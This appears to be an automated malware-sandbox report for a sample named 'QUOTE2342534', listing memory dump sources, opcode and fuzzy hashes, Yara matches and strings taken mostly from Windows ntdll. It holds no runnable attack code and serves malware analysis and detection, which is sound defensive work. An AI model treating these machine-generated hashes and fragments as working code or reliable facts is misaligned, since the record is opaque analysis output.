                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 34149453423321291395e97f7fd3819a3172f725e32b460b5e1285cbc3092280
                                                                                                                                                                                                                                                • Instruction ID: e3836e81eb4ad8f4b3ddfb68caa721ebc21f057a8c64aeeb7d9e4806cb52fad0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34149453423321291395e97f7fd3819a3172f725e32b460b5e1285cbc3092280
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F052754013458FE3A3CB1CC008B12FBDCDB00BA0F089465CD0283102C2F0EA80CAB1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                                                                                                • Instruction ID: 7e3263d9453a14a363c5473b0b566d16ccc8bbe6115ac88821c1d9dc771031dc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBE0D8323406012BE7119E598CC4F47B76EDFD6B10F040079BA046F256C9E2DC0983A4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                                                                                                • Instruction ID: 1ffcc90f6d9c61fa8edd1dc793de7eee5e53c147195da2c9bce64abc594b2b4d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46F030721442049FE3218F0AD984FA2F7F8EB45364F45C065F7099B561D379EC40CBA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                                                                                                • Instruction ID: a60a64a99d899e22b1216288f34a7abc795f78f510e8750659c929e2dea12127
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26F0ED7A2047599BEF16CF19D040AA9FBA8FB41360F0000D4F8428B312EB31E982CBA0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                                                                                • Instruction ID: 552f34b5ada7150f6e2a44dfebcf9d6d5e01f0ecde9da8496a4823c90d1011ff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84E0D832244145ABD3E15B698808B66F7A5EBD47A0F150429EA0A8B150FBF0DDC0C7E8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                                                                                • Instruction ID: dfd35df86792d67f96201709e3282fa6d8929ec0d4ff85dc2ef36d452057e85e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E0DF32A40210BBDB2197998D05F9AFEACDF94FA0F050058BA01EB194E570DE00D690
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                                                                                • Instruction ID: be1e45946513e199d0f8cc9cb11467fc55fc02cba93d49086b4e9e2111cfe09d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14E09B316803508FCB258A1DC140A53F7EDDFB5661F1580ADEA1547713C231F842D6D0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 77b374d3576fc3f264ade51420b88eca07fe438d6f3f2890f66dee28470c84bd
                                                                                                                                                                                                                                                • Instruction ID: 83e8d3dac7a5e5fe886ecfa84686662fae01c8a8d531eb4486a056f8794bd155
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77b374d3576fc3f264ade51420b88eca07fe438d6f3f2890f66dee28470c84bd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08E092321005549BC321BB29DD05F8AB79AEFA0360F114515F15657195CB34A911C788
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                                                                                • Instruction ID: 93a2ca660342b80205369f485a473ba640649d0bdd486155343277519afaaee6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DD012371D054DBBCB219F66DC01F957BA9E7A4BA0F444420B514875A1C63AE950D584
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9ca84bdc7ce9619f4a55d0dd5ef698cf07ce9e8de6a87aa844ddab0203b9a8f7
                                                                                                                                                                                                                                                • Instruction ID: 35699baf5041f521e87f2e440c011da16d1bf4ebad1990aad3838bfa3e11d843
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ca84bdc7ce9619f4a55d0dd5ef698cf07ce9e8de6a87aa844ddab0203b9a8f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7D0A731501109CBDF27CF08C510E2EFA78FF20A41F50006CEB0051030E378ED01CA00
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                                                                                • Instruction ID: 6c3991655045e4bce9ee4161ec9900442ba4524de228c90053e02e52355a2483
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5D0C935256E80CFD61BCB0CC5A4F15B3A8BB84B44F8104D0F402CBB22D66CD940CA00
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                                                                                • Instruction ID: 0e32b51943ece1c2e8244a01b90d73fcaf6bc13fe0cf665c3abf4282aea1fbb9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94C01232150644AFC7119A95CD01F0177A9E798B40F000421F20447571C535E810D644
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                                • Instruction ID: c040c1c995ea8c74d2756d216bfd520b6850d84bf7bb8be5e1f410fa7d5b39c2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BD01236100248EFCB01DF41C890D9ABB2AFBD8710F108019FD19076108A31ED62DA50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                                                                                • Instruction ID: e11e849fc49f1ea090c857721c97b72101e0f2bde606ff22fae08da391387c4a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DC04C797115458FCF15DB19D298F45B7E4F744750F1508D0E805CB722E624E841CA10
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
Strings
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
• Execute=1, xrefs: 01794713
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
• CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
• ExecuteOptions, xrefs: 017946A0
Memory Dump Source
• Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 0179031E
                                                                                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 01797BAC
                                                                                                                                                                                                                                                • RTL: Resource at %p, xrefs: 01797B8E
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 017972C1
                                                                                                                                                                                                                                                • RTL: Resource at %p, xrefs: 017972A3
                                                                                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !$"$%$%C$&$)7$*u$.$1$2$6$8t$D$Fe$H$IZ$J$L$RH$W$`$aY$b$f$lt$t$y$}
                                                                                                                                                                                                                                                • API String ID: 0-2838343554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6$O$S$\$s
                                                                                                                                                                                                                                                • API String ID: 0-3854637164
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: k!
                                                                                                                                                                                                                                                • API String ID: 0-2344202445
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: )
                                                                                                                                                                                                                                                • API String ID: 0-2427484129
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: W#
                                                                                                                                                                                                                                                • API String ID: 0-373598238
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ~%
                                                                                                                                                                                                                                                • API String ID: 0-3143733952
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d5f7726565e222215275fc6931adcae6b0ee511cd30fb44a33e93acd5e8d6f19
                                                                                                                                                                                                                                                • Instruction ID: ecc9c7176525e8a0943c621f8dec59bcdcb52070f847ef726d4e5965c809d939
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5f7726565e222215275fc6931adcae6b0ee511cd30fb44a33e93acd5e8d6f19
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A34120B1D11218AFDB04DF99C881AEEBBBCEF49710F10455AF914E6240E3B1AA41CFA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ee4566309bb0c039c4e9f792d5c38534fcb369479528be23946340e28e16567f
                                                                                                                                                                                                                                                • Instruction ID: 726c3ba2a9e60fe0e11ca2c22d07d35541f11d8c6a9824b6704995d8914172ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee4566309bb0c039c4e9f792d5c38534fcb369479528be23946340e28e16567f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B31C2B5A00248ABDB14DF98D880EEEB7F9EF8C314F108609F919A7240D730A851CBA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 162a3e1e8e03b3c8b35c72b2edbd4e0f31eaa0561688e302af6cf82a977e8f1f
                                                                                                                                                                                                                                                • Instruction ID: 6ba11c450c10b01e8976ba412109ef147e77a6b70717981faf0d16795eed0779
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 162a3e1e8e03b3c8b35c72b2edbd4e0f31eaa0561688e302af6cf82a977e8f1f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D531E8B5A00248ABDB14DF98D880EEEB7F9EF88714F108209FD59A7340D770A951CBA1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
